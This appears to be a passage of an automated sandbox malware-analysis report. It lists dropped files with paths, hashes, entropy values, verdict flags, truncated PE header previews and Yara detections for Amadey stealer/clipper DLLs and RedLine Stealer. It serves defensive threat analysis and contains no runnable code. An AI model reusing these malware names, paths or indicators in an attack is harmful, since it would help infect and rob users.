SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\vFvvln76msVyiTRvQQMSlc4y.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\AppData\Local\vSXx0NPQvyjoNMnvb7CbbdI3.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\AppData\Local\vjbBGdKLPrfqevTO8NoyWGaS.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\wQWWfYa2Wpi02lLWRtocQHQR.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3302400
Entropy (8bit):	7.983528152249971
Encrypted:	false
SSDEEP:	49152:fEOGfMr0UrM21zm6mVonU7JCGjh9FDrjop1jy50JtrD2sGxgLJ+r8+NSR63xrO0s:rtr0CnnGJCGl9GDnrNGaLJ5RKxy
MD5:	5C0D04CCD0CBCD8CC90A502DF8B512E7
SHA1:	0F905A137B801A69CF498FC0F8C5F00E75C5E689
SHA-256:	BC84C3A9CFEB083FE41A238C55EA3163B5C9E5103FEE0A7D7F4D8A1236B6D22D
SHA-512:	2D8D2630D4C362C67BC54BAD9B49DD0B11A5B9623CF106099B141E3FCF66D8032A3B855169BD636FEBFE517F0C8581DF62F70E77AF3C9CC7691AC407F7391D23
Malicious:	true
Reputation:	unknown
Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....r.......Qp........@..............................r.....x.3... ..................................................Pp......`p..E...en......F\.h....................................\p.(....................Pp.`............................MPRESS1.@p.......0......................MPRESS2.....Pp.......0..................rsrc....E...`p..F....0.............@..............................................................v2.19....0. ../;.,...p.#..JNy..P..{....I..W._...d......N. ^f.3...u...J......=.K\3.p...1....L.a...y.!.....}.\|.......1..K.l...Fl'......:..D.yfcOh.p..i.Ki>......d.Yc.C&J.0..P+.....`.M.....R..s.;.n.t.......%.....II4u. .......f_..+...\|.._.!.v.r...d..O..L.G...HZ...`....p.cy..n..........G..Bq.9#Q.......RU.?f.:.....a..'..>G.X{.........g....B(.....X.gu>M~...;...A2..<..........`.*~......pYs..p3g).Yr......n...a.K.i.Nd56.&J.'...r.n...T...Z..F.pK.\|.I$.u..W.Z..A.!....z.o\|.....f<

C:\Users\user\AppData\Local\wXamxKfyZPmwZrj3GYJOigy8.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:	dropped
Size (bytes):	3302400
Entropy (8bit):	7.983528152249971
Encrypted:	false
SSDEEP:	49152:fEOGfMr0UrM21zm6mVonU7JCGjh9FDrjop1jy50JtrD2sGxgLJ+r8+NSR63xrO0s:rtr0CnnGJCGl9GDnrNGaLJ5RKxy
MD5:	5C0D04CCD0CBCD8CC90A502DF8B512E7
SHA1:	0F905A137B801A69CF498FC0F8C5F00E75C5E689
SHA-256:	BC84C3A9CFEB083FE41A238C55EA3163B5C9E5103FEE0A7D7F4D8A1236B6D22D
SHA-512:	2D8D2630D4C362C67BC54BAD9B49DD0B11A5B9623CF106099B141E3FCF66D8032A3B855169BD636FEBFE517F0C8581DF62F70E77AF3C9CC7691AC407F7391D23
Malicious:	true
Reputation:	unknown
Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....r.......Qp........@..............................r.....x.3... ..................................................Pp......`p..E...en......F\.h....................................\p.(....................Pp.`............................MPRESS1.@p.......0......................MPRESS2.....Pp.......0..................rsrc....E...`p..F....0.............@..............................................................v2.19....0. ../;.,...p.#..JNy..P..{....I..W._...d......N. ^f.3...u...J......=.K\3.p...1....L.a...y.!.....}.\|.......1..K.l...Fl'......:..D.yfcOh.p..i.Ki>......d.Yc.C&J.0..P+.....`.M.....R..s.;.n.t.......%.....II4u. .......f_..+...\|.._.!.v.r...d..O..L.G...HZ...`....p.cy..n..........G..Bq.9#Q.......RU.?f.:.....a..'..>G.X{.........g....B(.....X.gu>M~...;...A2..<..........`.*~......pYs..p3g).Yr......n...a.K.i.Nd56.&J.'...r.n...T...Z..F.pK.\|.I$.u..W.Z..A.!....z.o\|.....f<

C:\Users\user\AppData\Local\xEsbKulN7hG8EPnegeeycsh4.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\xIvgySaF2JVAOfOVBY400p1d.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\AppData\Local\yB6Uf0WkvSc9vwkxXb9qHuqG.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\AppData\Local\yUsmdV5pQCUMcoI7bnDHRZY9.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884123026493015
Encrypted:	false
SSDEEP:	98304:d0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwm:2PMki6zio75L3pf3dedO4keCIwkoYbgG
MD5:	B94E72B3589D145678684496BCBAB477
SHA1:	57C159C07B85B1D01E57B20063B43D3337BFBF06
SHA-256:	3EAB2788D2375325BFF7128698032CCF09E90001E0A6737F2B097613FE057ABF
SHA-512:	9CDDCEC509A84E3DB8CF40E927536BE1339D60078E10A7BA0392B4788219335AC604196E926AFBBFF82B1F82336A2D157BEB656558D0498FFEBCF334217A4F1E
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.......R...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\yybBRlcB659iEk7Vesfqc6Zw.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\AppData\Local\zFwKnsnVeTcdv2qgWZnCYFfo.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6132736
Entropy (8bit):	7.152487916364851
Encrypted:	false
SSDEEP:	98304:mkpa5UKdCrbpaah6k5u6yA6nE0w5jjvjjjjl5S/hdIOrd/ClFkydIy3rBld3:m3fdCxaah75uUSw5jjvjjjj3dOr5TLyF
MD5:	BE94B480184550913C269E35A13AD28C
SHA1:	57C2F9CBEB17F80A540A6AEAFDD61F28443418CE
SHA-256:	40E1C85ADECCCC0D02B09681A421BA0457962BFD1A035A5BD234EC13C55AD2F4
SHA-512:	CB52C1D8E9D820A352FE6CB1DE21C80BB55512230C8287DB6C80A2C958CA23ECEA38C80480DEEF2A0E9157EFFEAE12E9868428404ACAD19A6D6F983A822580E3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.........."....'............X.%........@.............................`p.....kJ^...`...................................................!.......n..K....m...............n...............................!.(................................................... .........p.................. ..` Fp...........t..............@..@ .............X..............@... .....P.......j..............@..@ .....P......................@..@.ZiZ....5K...`...L..................@..@ .!....!......B..............@..@.idata........!......P..............@....tls..........!......R...................themida..K..."...K..T..............`....@2\|..........m......TZ.............@..H.reloc........n......F[................@.rsrc....K....n..L...H[.............@..@........................................................................................

C:\Users\user\AppData\Local\zTSMwf6EqjBUbab8YHX1tAIc.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	112128
Entropy (8bit):	6.380855494726669
Encrypted:	false
SSDEEP:	3072:xE5kJp+s5aP40bGsuZR+SVhJQ3ICRv4l:m5ka2obfuZR7Py4l
MD5:	2AFDBE3B99A4736083066A13E4B5D11A
SHA1:	4D4856CF02B3123AC16E63D4A448CDBCB1633546
SHA-256:	8D31B39170909595B518B1A03E9EC950540FABD545ED14817CAC5C84B91599EE
SHA-512:	D89B3C46854153E60E3FA825B394344EEE33936D7DBF186AF9D95C9ADAE54428609E3BF21A18D38FCE3D96F3E0B8E4E0ED25CB5004FBE288DE3AEF3A85B1D93F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Author: Joe Security Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$..........Lf.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text....".......$.................. ..`.rdata..4h...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1285632
Entropy (8bit):	6.460516510065148
Encrypted:	false
SSDEEP:	24576:ZvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dgg/l+yC7:ZsMPSYcS5wPi095PbgWl
MD5:	92FBDFCCF6A63ACEF2743631D16652A7
SHA1:	971968B1378DD89D59D7F84BF92F16FC68664506
SHA-256:	B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
SHA-512:	B8EA216D4A59D8858FD4128ABB555F8DCF3ACCA9138E663B488F09DC5200DB6DC11ECC235A355E801145BBBB44D7BEAC6147949D75D78B32FE9CFD2FA200D117
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Roaming\configurationValue\propro.exe
File Type:	data
Category:	modified
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Reputation:	unknown
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	553984
Entropy (8bit):	5.301212944878766
Encrypted:	false
SSDEEP:	12288:TAaw1dGg1Bz5TvcN3CNIb88WsNMP5F1k:TOzNW3CNIb88WsNMhF
MD5:	1FC4B9014855E9238A361046CFBF6D66
SHA1:	C17F18C8246026C9979AB595392A14FE65CC5E9F
SHA-256:	F38C27ECBEED9721F0885D3B2F2F767D60A5D1C0A5C98433357F570987DA3E50
SHA-512:	2AF234CAC24EC4A508693D9AFFA7F759D4B29BB3C9DDFFD9E6350959FD4DA26501553399D2B02A8EEAE8DACE6BFE9B2CE50462CE3C6547497F5B0EA6ED226B12
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....n................0.................. ........@.. ....................................@.....................................K.......h............................................................................ ............... ..H............text....... ...................... ..`.rsrc...h...........................@..@.reloc...............r..............@..B........................H.......dO...=......@...l...................................................(.......{......{....V.(......}......}.......0..E........u......96...(.....{.....{....o....9....(.....{.....{....o....8......... 6.j. )UU.Z(.....{....o....X )UU.Z(.....{....o....X....0...........r...p......%..{.....................:....q.............:....&.8..........o.....%..{.....................:....q.............:....&.8..........o.....(........{......{....V.(......}......}....*...0..E...

C:\Users\user\AppData\Roaming\configurationValue\propro.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082413880817399
Encrypted:	false
SSDEEP:	3072:nq6EgY6iwrUjL849wPzoGrjLSTAytAS3alcZqf7D34teqiOLibBO7:qqY6i/wPHfLSTAuAzlcZqf7DIXL
MD5:	CC90E3326D7B20A33F8037B9AAB238E4
SHA1:	236D173A6AC462D85DE4E866439634DB3B9EEBA3
SHA-256:	BD73EE49A23901F9FB235F8A5B29ADC72CC637AD4B62A9760C306900CB1678B7
SHA-512:	B5D197A05A267BF66509B6D976924CD6F5963532A9F9F22D1763701D4FBA3DFA971E0058388249409884BC29216FB33A51846562A5650F81D99CE14554861521
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\configurationValue\propro.exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.d...............0................. ... ....@.. ....................... ............@.................................t...O.... ..............................X................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Pictures\0ZzXdtKbBOkMTYdVV1HNUsqT.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\Pictures\0zuHPkqadZGFhsedqfFjHrEV.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
